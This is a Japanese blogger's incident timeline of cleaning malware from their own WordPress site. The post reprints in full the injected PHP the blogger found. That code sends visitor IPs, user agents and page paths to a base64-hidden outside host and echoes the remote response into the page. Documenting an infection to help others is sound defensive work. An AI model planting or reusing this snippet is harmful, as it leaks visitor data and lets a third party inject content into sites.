HOME >>  管理人ノート > ワードプレスで構築したサイトが,マルウェアに感染しました【時系列編】

ワードプレスで構築したサイトが,マルウェアに感染しました【時系列編】

ジメジメする毎日で、うんざり気味のまるです。

お恥ずかしい話ですが、このサイト、マルウェアに感染しました。
恥さらしもあるのですが、技術的に解決する情報提供のために、以下一連の流れを記載したいと思います。

▼7/4 11:00

1.Googleのウェブマスターツールより感染連絡メールが届く

ichizi_00

この時点で、サイトにアクセスると、ローカルに入れている「アバスト」ウィルス対策ソフトが警告を出した。

2.ウェブマスターツールの状態

ichizi_01

この段階で、少々パニック気味になる、、、感染経路は?何をやられたんだ?いつからだ??

とりあえず、サイトに基本認証をかけて、アクセスを封鎖する。

この段階で、14:00。

3.Googleのウェブマスターツールからヒントをもらう

ichizi_02

管理ツールの一覧から、URLをクリックすると、疑わしきコードがわかり、そいつを検索かけてみる。

/wp-content/cache/supercache

この中に、生成されるキャッシュファイルの中に発見するが、これは、一時的に書き出されるファイルのため、これを生成する親元を探さねば、、ムムムム

4.ファイルの更新日

最近設定等、更新してないのに、いくつかのファイルで、タイムスタンプが7/3のファイルを発見する。

中身を確認してみると、見たことない記述が、、、これだ

  1. <?php
  2. if (!isset($sRetry))
  3. {
  4. global $sRetry;
  5. $sRetry = 1;
  6. // This code use for global bot statistic
  7. $sUserAgent = strtolower($_SERVER[‘HTTP_USER_AGENT’]); // Looks for google serch bot
  8. $stCurlHandle = NULL;
  9. $stCurlLink = “”;
  10. if((strstr($sUserAgent, ‘google’) == false)&&(strstr($sUserAgent, ‘yahoo’) == false)&&(strstr($sUserAgent, ‘baidu’) == false)&&(strstr($sUserAgent, ‘msn’) == false)&&(strstr($sUserAgent, ‘opera’) == false)&&(strstr($sUserAgent, ‘chrome’) == false)&&(strstr($sUserAgent, ‘bing’) == false)&&(strstr($sUserAgent, ‘safari’) == false)&&(strstr($sUserAgent, ‘bot’) == false)) // Bot comes
  11. {
  12. if(isset($_SERVER[‘REMOTE_ADDR’]) == true && isset($_SERVER[‘HTTP_HOST’]) == true){ // Create bot analitics
  13. $stCurlLink = base64_decode( ‘aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw’).’?ip=’ . urlencode($_SERVER[‘REMOTE_ADDR’]) . ‘&useragent=’.urlencode($sUserAgent) . ‘&domainname=’ . urlencode($_SERVER[‘HTTP_HOST’]) . ‘&fullpath=’ . urlencode($_SERVER[‘REQUEST_URI’]) . ‘&check=’ . isset($_GET[‘look’]);
  14. @$stCurlHandle = curl_init( $stCurlLink );
  15. }
  16. }
  17. if ( $stCurlHandle !== NULL )
  18. {
  19. curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
  20. curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
  21. $sResult = @curl_exec($stCurlHandle);
  22. if ($sResult[0]==”O”)
  23. {$sResult[0]=” “;
  24. echo $sResult; // Statistic code end
  25. }
  26. curl_close($stCurlHandle);
  27. }
  28. }
  29. ?>

更新されたリストの一覧を作成して、ファイルごとの対処法を作成する。

ここで18:00

5.駆除作業開始

一覧から、作業をおこない、ファイルをアップする。

こちらは別途記事を書きましたので、↓参照してください

ワードプレスで構築したサイトが、マルウェアに感染しました【駆除編】

ここで19:00

6.確認

実際に、アクセスして、ソースコードを確認し、コードが吐き出されてないことを確認

キャッシュもクリアしようと思ったが、なぜかクリアされてたので、新しく生成されたファイルの中身を確認するが、ともに問題のコード話

7.Google先生に、再審査の依頼

審査の申し込みは、ウェブマスターツール→マルウェア→「審査をリクエス」ボタンを押すだけ

後は24時間以内に審査が終わるらしい・・・

ちなみに、2時間くらいして同ページにアクセスしたら、「ただいま再審査中です」なるメッセージがでました。

ここで20:00

8.ミッションコンプリート

無事、問題がなくなりました。

日付変わって、7/5 9:00

 

とっても長い一日でしたよー、無事終わって良かった・・・

あんど、ご迷惑おかけして、申し訳ございませんでした。今後共、セキュリティを強化して運営を行いますので、今後共よろしくお願いいたします。

 

以上

 

無料でFusion360を学べる

一ヶ月でFusion360をマスターするオリジナルノウハウを読むことができます。
  • 無料メールセミナーの詳細へ

Fusion360や3DCADを
より本格的に学びたい方はこちらへ!

【Fusion360初級】モノづくりのための3DCAD入門

初めての人でも学びやすい3DCAD・Fusion360を使い、モノづくりのための3D技術を学びます。
本講座は、ソフトの習得に重点が置かれる一般的な3DCADセミナーとは異なり、実際の製品に近い3Dモデルをテーマにしています。
最初は簡単なモデルから初めて、徐々に工業製品レベルの構造を作っていきます。

  1. 初めての人でも学びやすいFusion360(3DCAD)
  2. 「モノづくり」を始めるため、実際の製品をテーマ学習
  3. 部品同士を組み合わせ、「可動するモノ」を設計する
  Fusion360初級の詳細へ
工業デザイン:サングラス 工業デザイン:サングラス 工業デザイン:サングラス 工業デザイン:サングラス

【Fusion360専門】どんな3D形状でも素早く作れる!驚きの技術スカルプト

Fusion360の基本操作をある程度マスターした方を対象に!
Fusion360特有のモデリング機能が「スカルプト」です。 粘土をこねるような独特感覚で、従来の3DCADの常識を超える、直感的で素早いモデリングを行うことができます。

  1. スカルプトなら、粘土のように“あっという間に”モデリング
  2. スカルプトの仕組みを、しっかり理解できるカリキュラム
  3. 寸法や肉厚がある。ちゃんと使えるデータ作り
  スカルプトの詳細へ
工業デザイン:サングラス 工業デザイン:サングラス 工業デザイン:サングラス 工業デザイン:サングラス